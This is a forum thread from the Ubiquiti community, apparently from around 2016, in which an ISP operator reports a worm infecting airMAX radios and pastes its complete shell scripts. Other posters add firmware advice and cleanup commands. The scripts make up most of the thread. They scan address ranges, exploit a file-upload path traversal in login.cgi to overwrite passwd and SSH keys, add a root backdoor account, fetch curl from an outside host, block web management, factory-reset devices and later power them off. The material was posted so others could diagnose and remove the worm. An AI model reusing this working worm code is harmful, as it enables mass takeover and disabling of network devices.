Upcoming Maintenance Alert:

The UBNT Community will be upgraded at 5pm MDT on April 25th. During this time the community forums will be set to read-only status.

Learn more

×
Reply
Emerging Member
Posts: 49
Registered: ‎10-07-2013
Kudos: 33
Accepted Solution

Virus attack - URGENT @UBNT

Hi there,

 

since this afternoon MET we have on all AiRMAX antenas with access to/from the Internet virus attacks.

It's a self-distributing virus, so, once it can "see" neighbour antenas within the same subnet, it attacks the others.

Like all other viruses, it's within the /etc/persistant path and creates a subpath ./.mf and a tarball mf.tar and uses of course the rc.poststart

 

Here the path structure:

 

XM.v5.5.2# cd /etc/persistent/

 

XM.v5.5.2# ls
cardlist.txt dropbear_rsa_host_key rc.poststart
dropbear_dss_host_key mf.tar

 

XM.v5.5.2# cat rc.poststart
cd /etc/persistent ; tar -xf mf.tar ; /etc/persistent/.mf/mother

 

XM.v5.5.2# ls -al
drwxr-xr-x 3 root admin 160 Aug 16 2012 .
drwxr-xr-x 10 root admin 820 Aug 16 2012 ..
drwxrwxr-x 2 1001 1001 320 May 13 11:23 .mf
lrwxrwxrwx 1 root admin 21 Jan 1 1970 cardlist.txt -> /usr/etc/cardlist.txt
-rw------- 1 root admin 457 Aug 16 2012 dropbear_dss_host_key
-rw------- 1 root admin 427 Aug 16 2012 dropbear_rsa_host_key
-rw------- 1 root admin 20480 May 13 11:21 mf.tar

-rwxr-xr-x 1 root admin 65 May 13 11:21 rc.poststart

 

XM.v5.5.2# cd .mf

 

XM.v5.5.2# ls -al
drwxrwxr-x 2 1001 1001 320 May 13 11:23 .
drwxr-xr-x 3 root admin 160 Aug 16 2012 ..
-rwxr-xr-x 1 root admin 64372 May 19 2009 curl
-rwxrwxr-x 1 1001 1001 670 May 12 20:39 download
-rwxrw-r-- 1 1001 1001 747 May 12 20:44 f u c k
-rwxrw-r-- 1 1001 1001 199 May 12 20:44 f u c k e r
-rwxrw-r-- 1 1001 1001 480 May 12 23:30 i
-rwxrwxr-x 1 1001 1001 944 May 12 22:28 infect
-rw-r--r-- 1 root admin 1062608 May 19 2009 libcrypto.so.0.9.8
-rwxr-xr-x 1 root admin 207852 May 19 2009 libcurl.so.4
-rw-r--r-- 1 root admin 223552 May 19 2009 libssl.so.0.9.8
-rw------- 1 root admin 20480 Aug 16 2012 mf.tar
-rw-r--r-- 1 1001 1001 427 May 12 19:38 mfid
-rw-rw-r-- 1 1001 1001 232 May 12 19:39 mfid.pub
-rwxrw-r-- 1 1001 1001 952 May 13 06:39 mother
-rwxrwxr-x 1 1001 1001 1434 May 13 06:36 search

 

We're just cleaning thousands of CPEs ...

 

Hope it's helpfull...

 

@ubnt

It's attacking any FW-Version. I think it's using ssh port 22...Please investigate!!!

 

Greez

AMX


Accepted Solutions
Ubiquiti Employee
Posts: 7,892
Registered: ‎11-27-2012
Kudos: 2149
Solutions: 498
Contributions: 73

Re: Virus attack - URGENT @UBNT

[ Edited ]

HI Everyone,

Updating this post to point to most up to date info in airMAX Blog.

 

http://community.ubnt.com/t5/airMAX-Updates-Blog/Important-Security-Notice-and-airOS-5-6-5-Release/b...

 

EDIT: Added updated removal tool v1.0

 

View solution in original post


All Replies
Emerging Member
Posts: 49
Registered: ‎10-07-2013
Kudos: 33

Re: Virus attack - URGENT @UBNT

cat search
#!/bin/sh
trap '' HUP
chmod +x /etc/persistent/.mf/curl
cd /etc/persistent/.mf/

ip=$(ifconfig ath0 2>/dev/null | grep 'inet ' | sed "s/.*inet addr:\([^ ]*\).*/\1/g")
if [ -z "$ip" ] ; then
ip=$(ifconfig br0 2>/dev/null | grep 'inet ' | sed "s/.*inet addr:\([^ ]*\).*/\1/g")
fi
if [ -z "$ip" ] ; then
ip=$(ifconfig ppp0 2>/dev/null | grep 'inet ' | sed "s/.*inet addr:\([^ ]*\).*/\1/g")
fi
p1=$(echo $ip | cut -d "." -f1)
test ! -z "$p1" || p1=1
test -z "$1" || p1=$(($p1+$1))
p2=$(echo $ip | cut -d "." -f2)
test ! -z "$p2" || p2=0
test -z "$2" || p2=$(($p2+$2))
p3=$(echo $ip | cut -d "." -f3)
test ! -z "$p3" || p3=0
p3c=0
p2c=0
p1c=0
p4=0
p5=0

while [ $p1c -lt 224 ]
do
while [ $p2c -lt 255 ]
do
while [ $p3c -lt 255 ]
do
while [ $p4 -lt 255 ]
do
while [ $p5 -lt 4 ]
do
if [ $p5 = 0 ] ; then
ip="$p1.$p2.$p3.$p4"
fi
if [ $p5 = 1 ] ; then
ip="$p3.$p4.$p2.$p1"
fi
if [ $p5 = 2 ] ; then
ip="$p1.$p3.$p2.$p4"
fi
if [ $p5 = 3 ] ; then
rn="$(dd if=/dev/urandom bs=4 count=1)" 2>/dev/null >/dev/null
num=`echo $rn | hexdump -b 2>/dev/null | head -n 1 | cut -f 2-5 -d' ' | tr " " "."`
ip=$num
fi

/etc/persistent/.mf/infect $ip

p5=$((p5+1))
done
p5=0
p4=$((p4+1))
done
p4=0
p3=$((p3+1))
if [ "$p3" -gt 255 ] ; then p3=0 ; fi
p3c=$((p3c+1))
done
p4=0
p3c=0
p3=0
p2=$((p2+1))
if [ "$p2" -gt 255 ] ; then p2=0 ; fi
p2c=$((p2c+1))
done
p4=0
p3=0
p3c=0
p2=0
p2c=0
p1=$((p1+1))
if [ "$p1" -gt 223 ] ; then p1=1 ; fi
p1c=$((p1c+1))
done

 

Emerging Member
Posts: 49
Registered: ‎10-07-2013
Kudos: 33

Re: Virus attack - URGENT @UBNT

cat download
#!/bin/sh
per=/etc/persistent/.mf

test -d /tmp/down || mkdir /tmp/down
cd /tmp/down

dwn() {
wget -O temp.ipk $1
tar -xzf temp.ipk
tar -xzf data.tar.gz
mv $2 $per
rm -rf /tmp/down/*
}

 

test -e $per/curl || dwn http://downloads.openwrt.org/kamikaze/8.09.1/adm5120/packages/curl_7.17.1-1_mips.ipk usr/bin/curl
chmod +x $per/curl
test -e $per/libcurl.so.4 || dwn http://downloads.openwrt.org/kamikaze/8.09.1/adm5120/packages/libcurl_7.17.1-1_mips.ipk usr/lib/libcurl.so.4.0.1
mv $per/libcurl.so.4.0.1 $per/libcurl.so.4
test -e $per/libssl.so.0.9.8 || dwn http://downloads.openwrt.org/kamikaze/8.09.1/adm5120/packages/libopenssl_0.9.8i-3.1_mips.ipk 'usr/lib/lib*'

 

SuperUser
Posts: 13,119
Registered: ‎02-03-2013
Kudos: 6821
Solutions: 544
Contributions: 2

Re: Virus attack - URGENT @UBNT

What passwords were on these radios if any?

ubiquiti certified trainer :: ubwa | uewa
Emerging Member
Posts: 49
Registered: ‎10-07-2013
Kudos: 33

Re: Virus attack - URGENT @UBNT

cat f u c k
#!/bin/sh
url="http://$1"
LD_LIBRARY_PATH=/etc/persistent/.mf/ ./curl -m 3 -s -L -k -c cookie $url
LD_LIBRARY_PATH=/etc/persistent/.mf/ ./curl -m 3 -s -k -b cookie -L -F "uri=index.cgi" -F "username=mother" -F "password=f u c k e r" -H "Expect:" "$url/login.cgi"
LD_LIBRARY_PATH=/etc/persistent/.mf/ ./curl -m 3 -s -k -b cookie -L -F "uri=reset.cgi" -H "Expect:" "${url}/reset.cgi"

url="https://$1"
LD_LIBRARY_PATH=/etc/persistent/.mf/ ./curl -m 3 -s -L -k -c cookie $url
LD_LIBRARY_PATH=/etc/persistent/.mf/ ./curl -m 3 -s -k -b cookie -L -F "uri=index.cgi" -F "username=mother" -F "password=f u c k e r" -H "Expect:" "$url/login.cgi"
LD_LIBRARY_PATH=/etc/persistent/.mf/ ./curl -m 3 -s -k -b cookie -L -F "uri=reset.cgi" -H "Expect:" "${url}/reset.cgi"

 

Highlighted
Emerging Member
Posts: 49
Registered: ‎10-07-2013
Kudos: 33

Re: Virus attack - URGENT @UBNT

cat f u c k er
#!/bin/sh
if [ -z "$1" ] ; then
f=/tmp/inf
else
f=$1
fi
cd /etc/persistent/.mf

cat $f | sort -r | while read ip ; do
./f u c k $ip
done

(sleep 99999; /etc/persistent/f u c k e r >/dev/null 2>/dev/null) &

Emerging Member
Posts: 49
Registered: ‎10-07-2013
Kudos: 33

Re: Virus attack - URGENT @UBNT

cat infect
#!/bin/sh
ip=$1
trap '' HUP
chmod +x /etc/persistent/.mf/curl
cd /etc/persistent/.mf/

if [ "$2" = "dbss" ] ; then
ssh -f -y -y -i mfid mother@${ip} "tar -xf mf.tar ; /etc/persistent/.mf/i"
exit 0
fi

cu() {
wh=$1
to=$2
ur=$3
LD_LIBRARY_PATH=/etc/persistent/.mf/ ./curl -s -m 4 -F "file=@/etc/$wh;filename=../../etc/$to" -H "Expect:" "$ur/login.cgi" -k 2>/dev/null >/dev/null
}

is=`LD_LIBRARY_PATH=/etc/persistent/.mf/ ./curl -s -L -k -c /tmp/ac -m 3 $ip 2>/dev/null | grep airos | wc -l`
if [ "$is" = "1" ] ; then
echo $ip >> /tmp/inf
cu passwd passwd http://${ip}
cu persistent/.mf/mfid.pub dropbear/authorized_keys http://${ip}
cu persistent/.mf/mf.tar persistent/mf.tar http://${ip}
cu passwd passwd https://${ip}
cu persistent/.mf/mfid.pub dropbear/authorized_keys https://${ip}
cu persistent/.mf/mf.tar persistent/mf.tar https://${ip}

( /etc/persistent/.mf/infect $ip dbss ) &
( sleep 15 ; killall ssh ) &
sleep 17
fi

Emerging Member
Posts: 49
Registered: ‎10-07-2013
Kudos: 33

Re: Virus attack - URGENT @UBNT

cat i
#!/bin/sh
per=/etc/persistent
grep "mother" /etc/passwd >/dev/null || echo 'mother:$1$J1CHZtqy$n0XDmW4UCVAVYZqFzvoEC/:0:0:Administrator:/etc/persistent:/bin/sh' >> /etc/passwd
grep "f/mother" $per/rc.poststart 2>/dev/null >/dev/null || echo "cd /etc/persistent ; tar -xf mf.tar ; $per/.mf/mother" >> $per/rc.poststart
chmod +x $per/rc.poststart
rm $per/mother
rm $per/download
rm $per/f u c k e r
rm $per/search
rm $per/curl
rm $per/lib*
cfgmtd -w -p /etc/

reboot -n -f >/dev/null &

Emerging Member
Posts: 49
Registered: ‎10-07-2013
Kudos: 33

Re: Virus attack - URGENT @UBNT

cat mother
#!/bin/sh
per=/etc/persistent
grep "mother" /etc/passwd >/dev/null || echo 'mother:$1$J1CHZtqy$n0XDmW4UCVAVYZqFzvoEC/:0:0:Administrator:/etc/persistent:/bin/sh' >> /etc/passwd

iptables -I INPUT -p tcp --dport 80 -j DROP 2>/dev/null
iptables -I INPUT -p tcp -i lo --dport 443 -j DROP 2>/dev/null

cp $per/mf.tar $per/.mf/

(sleep 90 ; $per/.mf/download )&
(sleep 70 ; sleep 50 ; sleep 30 ; $per/.mf/search 2>/dev/null >/dev/null )&
(sleep 70 ; sleep 50 ; sleep 35 ; $per/.mf/search 7 15 2>/dev/null >/dev/null )&
(sleep 70 ; sleep 50 ; sleep 45 ; $per/.mf/search 0 64 2>/dev/null >/dev/null )&
(sleep 70 ; sleep 50 ; sleep 55 ; $per/.mf/search 25 16 2>/dev/null >/dev/null )&

(sleep 66666 ; $per/.mf/f u c k e r 2>/dev/null >/dev/null )&
(sleep 666666 ; sed -i 's/wireless.1.ssid=.*/wireless.1.ssid=motherf u c k e r/' /tmp/system.cfg ; sed -i 's/radio.1.mode=.*/radio.1.mode=Master/' /tmp/system.cfg ; cfgmtd -f /tmp/system.cfg -w ; sleep 15 ; poweroff ) &

 

Emerging Member
Posts: 49
Registered: ‎10-07-2013
Kudos: 33

Re: Virus attack - URGENT @UBNT

special ones...of course NOT standard PWs and also other USER than the standards

SuperUser
Posts: 13,119
Registered: ‎02-03-2013
Kudos: 6821
Solutions: 544
Contributions: 2

Re: Virus attack - URGENT @UBNT


amx wrote:

special ones...of course NOT standard PWs and also other USER than the standards


What firmware?   There was an upgrade last summer to prevent an exploit. 

ubiquiti certified trainer :: ubwa | uewa
SuperUser
Posts: 10,882
Registered: ‎12-08-2008
Kudos: 7682
Solutions: 481
Contributions: 1

Re: Virus attack - URGENT @UBNT


ClaudeSS wrote:

amx wrote:

special ones...of course NOT standard PWs and also other USER than the standards


What firmware?   There was an upgrade last summer to prevent an exploit. 


The CLI prompt in the OP looks like 5.5.2...

Jim

" How can anyone trust Scientists? If new evidence comes along, they change their minds! " Politician's joke (sort of...)

"Humans are allergic to change..They love to say, ‘We’ve always done it this way.’ I try to fight that. "Admiral Grace Hopper, USN, Computer Scientist
Ancient Member
Posts: 27,328
Registered: ‎05-05-2012
Kudos: 8523
Solutions: 1312

Re: Virus attack - URGENT @UBNT


ClaudeSS wrote:

amx wrote:

special ones...of course NOT standard PWs and also other USER than the standards


What firmware?   There was an upgrade last summer to prevent an exploit. 


5.5.2 according to the OP.

 

http://community.ubnt.com/t5/airMAX-General-Discussion/5-6-3-and-5-6-4-Vulnerability/m-p/1562915#M54...

Emerging Member
Posts: 49
Registered: ‎10-07-2013
Kudos: 33

Re: Virus attack - URGENT @UBNT

at this moment any FW 5.x.x

New Member
Posts: 11
Registered: ‎03-10-2009

Re: Virus attack - URGENT @UBNT

how to remove completely?
any official position of ubiquiti? a tutorial type skynet

Emerging Member
Posts: 49
Registered: ‎10-07-2013
Kudos: 33

Re: Virus attack - URGENT @UBNT

I didn't see anything from UBNT at his moment. Here the removal:

 

cd /etc/persistent/
rm mf.tar
rm rc.poststart
rm -R .mf
cfgmtd -p /etc/persistent/ -w
reboot

Emerging Member
Posts: 49
Registered: ‎10-07-2013
Kudos: 33

Re: Virus attack - URGENT @UBNT

as the virus needs to download CURL, also block on your DNS this domain:

 

downloads.openwrt.org

New Member
Posts: 12
Registered: ‎12-12-2013
Kudos: 2

Re: Virus attack - URGENT @UBNT

 
Hello, since this morning all radios with firmware 5.5.x  have been modified ...
To correct, enter through ssh, and delete everything with the commands: (you can copy and paste)

cd / etc / persistent; rm -R mcuser; rm -R .mf; rm *; cfgmtd -w -p / etc /; killall -9 search; killall -9 mother; killall -9 sleep; reboot

after restarting switch ports 80 and 22 and 443 ... and upgrade to version 5.6.4

for me it worked well.
Ubiquiti Employee
Posts: 7,892
Registered: ‎11-27-2012
Kudos: 2149
Solutions: 498
Contributions: 73

Re: Virus attack - URGENT @UBNT

As @LLigetfa linked above...

 

Anything prior to the following should be considered insecure.  

 

5.5.11 XM/TI.

5.5.10u2 XW 

5.6.2 XW/XM/TI

 

There have been some additional security improvements in 5.6.3/4

 

 

If you haven't already, please subscribe to the airMAX blog for new release and security notices. It is very likely these devices were exploited using a known vulnerability that was addressed last year.  This exploit would allow an unauthenticated (no password required) user root/admin level control of any device with http/https exposed.

 

http://community.ubnt.com/t5/airMAX-Updates-Blog/Security-Release-for-airMAX-TOUGHSwitch-and-airGate...

 

 

 

Emerging Member
Posts: 49
Registered: ‎10-07-2013
Kudos: 33

Re: Virus attack - URGENT @UBNT

Hi James.

 

Thanks for the information.

 

Ahm...just for my info: we're one of the largest WISPs in Spain and we didn't receive any Vulnerability Warning?

Neither on direct way nor via our Wholesale Partner Landatel!?

 

You will pay the costs for cleaning up all customers' CPEs affected of this and other issues provoced by UBNT-Software failure?

 

Thanks in advance for your feedback!

Reply